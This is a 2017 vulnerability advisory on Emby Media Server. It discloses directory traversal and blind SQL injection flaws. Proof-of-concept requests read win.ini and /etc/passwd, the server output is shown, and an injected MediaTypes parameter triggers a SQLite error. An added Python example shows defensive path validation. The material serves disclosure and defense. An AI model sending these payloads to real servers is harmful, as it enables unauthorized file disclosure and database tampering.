SSD Advisory – Emby Media Server Multiple Vulnerabilities
Credit to Author: Maor Schwartz | Date: Tue, 25 Apr 2017 05:03:48 +0000
Want to get paid for a vulnerability similar to this one?
Contact us at: sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom
Vulnerabilities Summary
The following advisory describes three (3) vulnerabilities found in Emby Media Server.
Affected versions are: 3.1.5, 3.1.2, 3.1.1, 3.1.0 and 3.0.0.
Emby Media Server (formerly Media Browser) is a media server designed to organize, play, and stream audio and video to a variety of devices. Emby is open-source and uses a client-server model. Two comparable media servers are Plex and Windows Media Center.
The vulnerabilities found in Emby Media Server are:
- Directory Traversal
- File Disclosure
- SQL Injection
Credit
An independent security researcher, Gjoko Krstic from Zero Science Lab, has reported these vulnerabilities to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor Response
Emby was notified about the vulnerabilities in March 2017; shortly afterwards they released a new version that addresses them. They have not, however, provided any version information or release notes that reflect this.
Vulnerabilities Details
Directory Traversal File Disclosure
Emby Media Server suffers from a directory traversal file disclosure vulnerability. Input passed via the ‘swagger-ui’ route handled in SwaggerService.cs is not properly verified before being used to load resources. This can be exploited to disclose the contents of arbitrary files via directory traversal.
Version 3.1.0 is affected on the Linux, Windows and Mac platforms.
Version 3.1.5 is affected only in the Windows release.
Vulnerable Code
Vulnerable file path: /Emby.Server.Implementations/HttpServer/SwaggerService.cs
Proof of Concept
An attacker sends the following request (when Emby runs on a Windows machine):
GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
The server responds with:
HTTP/1.1 200 OK
X-UA-Compatible: IE=Edge
Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
ETag: "07bec80f76d20d26dd300a855219d321"
Cache-Control: public
Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Content-Type: application/octet-stream
Date: Thu, 22 Dec 2016 10:43:53 GMT
Content-Length: 403
Connection: close

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo
When Emby runs on a Linux machine, a similar request:
http://127.0.0.1/%2femby%2fswagger-ui%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
would yield this server response:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...
...
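An added example, not Emby's code and not part of the advisory: the kind of allow-list resource resolution that SwaggerService.cs needed before loading a file, with the on-disk UI root path and the URL prefix assumed. It percent-decodes until stable, treats backslashes as separators (the Windows case above), rejects dot segments and re-checks containment, so both proof-of-concept paths are refused while ordinary UI files still resolve.

```python
import posixpath
from urllib.parse import unquote

SWAGGER_ROOT = "/opt/emby/swagger-ui"   # assumed on-disk location of the bundled UI
URL_PREFIX = "emby/swagger-ui/"         # route prefix from the advisory's requests


def fully_unquote(s: str, rounds: int = 3) -> str:
    """Percent-decode until stable so %2f or %252f cannot smuggle a separator."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            return s
        s = decoded
    return s


def resolve_swagger_resource(request_target: str, root: str = SWAGGER_ROOT):
    """Map a request target onto a file under root; return None to refuse it."""
    path = fully_unquote(request_target.split("?", 1)[0])
    # Windows hosts accept backslashes as separators; normalise before checking.
    path = path.replace("\\", "/").lstrip("/")
    if not path.startswith(URL_PREFIX):
        return None
    segments = path[len(URL_PREFIX):].split("/")
    # Allow-list the segment shape: no empty, "." or ".." components, no NUL bytes.
    if any(seg in ("", ".", "..") or "\0" in seg for seg in segments):
        return None
    candidate = posixpath.normpath(posixpath.join(root, *segments))
    # Independent containment check: the normalised path must stay under root.
    if not candidate.startswith(root.rstrip("/") + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed inputs: a benign UI file plus the two traversal shapes above.
    print(resolve_swagger_resource("/emby/swagger-ui/index.html"))
    print(resolve_swagger_resource("/emby/swagger-ui/" + "..\\" * 16 + "windows\\win.ini"))
    print(resolve_swagger_resource("/%2femby%2fswagger-ui%2f" + "..%2f" * 12 + "etc%2fpasswd"))
```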
SQL Injection
Emby suffers from a blind SQL injection vulnerability. Input passed via the GET parameter ‘MediaTypes’ is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code without authentication.
Proof of Concept
An attacker sends the following request:
GET /emby/Users/abb355429db54e159ac2a7a3cbd6eb12/Items?ParentId=4cd160cad6c50f34ca42be0136af2316&Filters=IsNotFolder&Recursive=true&SortBy=SortName&MediaTypes=Audio%2cVideo'&Limit=100&Fields=MediaSources%2CChapters&ExcludeLocationTypes=Virtual HTTP/1.1
Host: 10.211.55.3:8096
accept: application/json
x-mediabrowser-token: ba5a68dfa1134bd6af642228bbf757bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome 55.0.2883.87", DeviceId="104a154d5aa8c9576a2508113b47a53b6170253c", Version="3.1.0.0", UserId="abb355429db54e159ac2a7a3cbd6eb12"
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Connection: close
Server response:
HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Mono-HTTPAPI/1.0
Date: Tue, 21 Feb 2017 12:06:09 GMT
Content-Length: 64
Connection: close

Exception of type 'SQLitePCL.pretty.SQLiteException' was thrown.